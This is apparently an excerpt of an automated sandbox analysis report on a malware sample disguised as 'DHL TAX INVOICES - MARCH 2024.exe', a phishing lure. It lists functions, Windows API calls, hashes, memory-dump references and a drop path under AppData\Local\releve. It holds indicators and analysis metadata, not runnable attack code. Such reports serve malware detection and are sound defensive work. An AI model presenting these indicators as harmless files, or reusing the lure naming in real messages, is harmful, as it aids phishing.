                                                            • Opcode Fuzzy Hash: 90cc4c9737d43430731b600de694bcf2d45feac9894761d90dfe22e9228b7257
                                                            • Instruction Fuzzy Hash: 1DC04C31204B029AD7506B609F097177954AB50781F11C8396946E00A0DE348465DE2D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00405E05 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00412047,0040CED0,004032EF,0040CED0,00412047,00414ED0,00004000,?,00000000,00403119,00000004), ref: 00405E19
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: FileWrite
                                                            • String ID:
                                                            • API String ID: 3934441357-0
                                                            • Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                            • Instruction ID: dac0b8971ba2920abb5474f128329a0fa477ab7403896bbfc0984bb8014ca22f
                                                            • Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                            • Instruction Fuzzy Hash: 4AE08632100119ABCF105F50DC00EEB376CEB00350F004832FA65E2040E230EA219BE4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00402CC9 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: Open
                                                            • String ID:
                                                            • API String ID: 71445658-0
                                                            • Opcode ID: 2cb17219caef5c2c057f25c6a0d5a563c17eea178cedf0001938d6a474f7be63
                                                            • Instruction ID: ef45ff86538a2d51f1b0222ec8c1b297abd10be8bd22699319dc95f068cee933
                                                            • Opcode Fuzzy Hash: 2cb17219caef5c2c057f25c6a0d5a563c17eea178cedf0001938d6a474f7be63
                                                            • Instruction Fuzzy Hash: CCE08676244108BFDB00DFA8DE47FD537ECAB14700F004031BA08D70D1C674E5508768
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00405DD6 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414ED0,0040CED0,0040336B,0040A230,0040A230,0040326F,00414ED0,00004000,?,00000000,00403119), ref: 00405DEA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: FileRead
                                                            • String ID:
                                                            • API String ID: 2738559852-0
                                                            • Opcode ID: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
                                                            • Instruction ID: f39de87387fc754cac4ceee649b5e38243fe2bf9183d254406dbd5143e25ae03
                                                            • Opcode Fuzzy Hash: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
                                                            • Instruction Fuzzy Hash: 57E0EC3221125AABDF509F65DC08AEB7B6DEF05360F008837F955E6160D631E9219BE8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040428E Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004042A0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID:
                                                            • API String ID: 3850602802-0
                                                            • Opcode ID: c2a25a807fea80bd58a61b321fa2af33aa5b35e52655131f61520799e32131e4
                                                            • Instruction ID: 8584b4a80e8197aea4c9dd325401cbfcfbe68695eba590e205f4256e4e85e437
                                                            • Opcode Fuzzy Hash: c2a25a807fea80bd58a61b321fa2af33aa5b35e52655131f61520799e32131e4
                                                            • Instruction Fuzzy Hash: 67C04C71740600BBDA20CB649D45F1677546754740F1448697640A60E0C674D420D62C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040336E Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040306C,?), ref: 0040337C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: FilePointer
                                                            • String ID:
                                                            • API String ID: 973152223-0
                                                            • Opcode ID: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
                                                            • Instruction ID: 64c0fffafe8abe290eaf2022e63b776f1a4a3bd25e2fde741040b5855636c72c
                                                            • Opcode Fuzzy Hash: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
                                                            • Instruction Fuzzy Hash: 70B01231140300BFDA214F00DF09F057B21AB90700F10C034B344780F086711075EB0D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00404277 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(00000028,?,00000001,004040A3), ref: 00404285
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID:
                                                            • API String ID: 3850602802-0
                                                            • Opcode ID: 7bbf2f5232cd2574a5b007ccbcd78797cc8e3f4bb2dd07224d7ba7f17a9ad77c
                                                            • Instruction ID: 3e0bacd84e958153637e663f6e0df00a268db6e73930f78988907d41dcf2010e
                                                            • Opcode Fuzzy Hash: 7bbf2f5232cd2574a5b007ccbcd78797cc8e3f4bb2dd07224d7ba7f17a9ad77c
                                                            • Instruction Fuzzy Hash: 32B01235290A00FBDE214B00EE09F457E62F76C701F008478B340240F0CAB300B1DB19
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00404264 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • KiUserCallbackDispatcher.NTDLL(?,0040403C), ref: 0040426E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: CallbackDispatcherUser
                                                            • String ID:
                                                            • API String ID: 2492992576-0
                                                            • Opcode ID: 8a62e99fe4a67b047fdc914663d327e58adf51456459288db10dd5d3044e9a2e
                                                            • Instruction ID: ea629541fdd2228df96855dc4de4e407fdbb002a66502a1a5a86269346c048a7
                                                            • Opcode Fuzzy Hash: 8a62e99fe4a67b047fdc914663d327e58adf51456459288db10dd5d3044e9a2e
                                                            • Instruction Fuzzy Hash: C0A001B6644500ABCE129F90EF49D0ABBB2EBE8742B518579A285900348A364961EB59
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Non-executed Functions

                                                            Function 00404C59 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDlgItem.USER32(?,000003F9), ref: 00404C71
                                                            • GetDlgItem.USER32(?,00000408), ref: 00404C7C
                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404CC6
                                                            • LoadBitmapW.USER32(0000006E), ref: 00404CD9
                                                            • SetWindowLongW.USER32(?,000000FC,00405251), ref: 00404CF2
                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D06
                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D18
                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404D2E
                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D3A
                                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D4C
                                                            • DeleteObject.GDI32(00000000), ref: 00404D4F
                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D7A
                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D86
                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E1C
                                                            • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E47
                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E5B
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404E8A
                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404E98
                                                            • ShowWindow.USER32(?,00000005), ref: 00404EA9
                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FA6
                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040500B
                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405020
                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405044
                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405064
                                                            • ImageList_Destroy.COMCTL32(?), ref: 00405079
                                                            • GlobalFree.KERNEL32(?), ref: 00405089
                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405102
                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 004051AB
                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051BA
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 004051DA
                                                            • ShowWindow.USER32(?,00000000), ref: 00405228
                                                            • GetDlgItem.USER32(?,000003FE), ref: 00405233
                                                            • ShowWindow.USER32(00000000), ref: 0040523A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                            • String ID: $M$N
                                                            • API String ID: 1638840714-813528018
                                                            • Opcode ID: 2479b366cad44d8d2a02fbd124e29c277f71441e1411fda8dea8c44bba4244d6
                                                            • Instruction ID: ce840dee0c3a5b827351c7f25dbf2e3605d0905f5c54158640504e6bfb71dde6
                                                            • Opcode Fuzzy Hash: 2479b366cad44d8d2a02fbd124e29c277f71441e1411fda8dea8c44bba4244d6
                                                            • Instruction Fuzzy Hash: 4C023EB0A00209EFDF209F64CD45AAE7BB5FB84355F10817AE610BA2E1C7799D52CF58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004046DD Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDlgItem.USER32(?,000003FB), ref: 0040472C
                                                            • SetWindowTextW.USER32(00000000,?), ref: 00404756
                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00404807
                                                            • CoTaskMemFree.OLE32(00000000), ref: 00404812
                                                            • lstrcmpiW.KERNEL32(ExecToStack,00423728,00000000,?,?), ref: 00404844
                                                            • lstrcatW.KERNEL32(?,ExecToStack), ref: 00404850
                                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404862
                                                              • Part of subcall function 004058A7: GetDlgItemTextW.USER32(?,?,00000400,00404899), ref: 004058BA
                                                              • Part of subcall function 00406412: CharNextW.USER32(?,*?|<>/":,00000000,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe",00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 00406475
                                                              • Part of subcall function 00406412: CharNextW.USER32(?,?,?,00000000), ref: 00406484
                                                              • Part of subcall function 00406412: CharNextW.USER32(?,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe",00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 00406489
                                                              • Part of subcall function 00406412: CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe",00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 0040649C
                                                            • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,00000001,004216F8,?,?,000003FB,?), ref: 00404925
                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404940
                                                              • Part of subcall function 00404A99: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B3A
                                                              • Part of subcall function 00404A99: wsprintfW.USER32 ref: 00404B43
                                                              • Part of subcall function 00404A99: SetDlgItemTextW.USER32(?,00423728), ref: 00404B56
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                            • String ID: (7B$A$C:\Users\user\AppData\Local\releve$ExecToStack
                                                            • API String ID: 2624150263-569928056
                                                            • Opcode ID: b1c988a2c75076f1e590c134e256cc95cfc43452e7a67f3061b6eea54995cb3a
                                                            • Instruction ID: d5aaf60bd55b21875b9c8b9a8d0b3d7e01f34e6f89f3adcbdcc63617e1d21faf
                                                            • Opcode Fuzzy Hash: b1c988a2c75076f1e590c134e256cc95cfc43452e7a67f3061b6eea54995cb3a
                                                            • Instruction Fuzzy Hash: B7A191F1A00209ABDB11AFA5CC45AAF77B8EF84354F10847BF601B62D1D77C99418B6D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00402095 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402114
                                                            Strings
                                                            • C:\Users\user\AppData\Local\releve, xrefs: 00402154
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
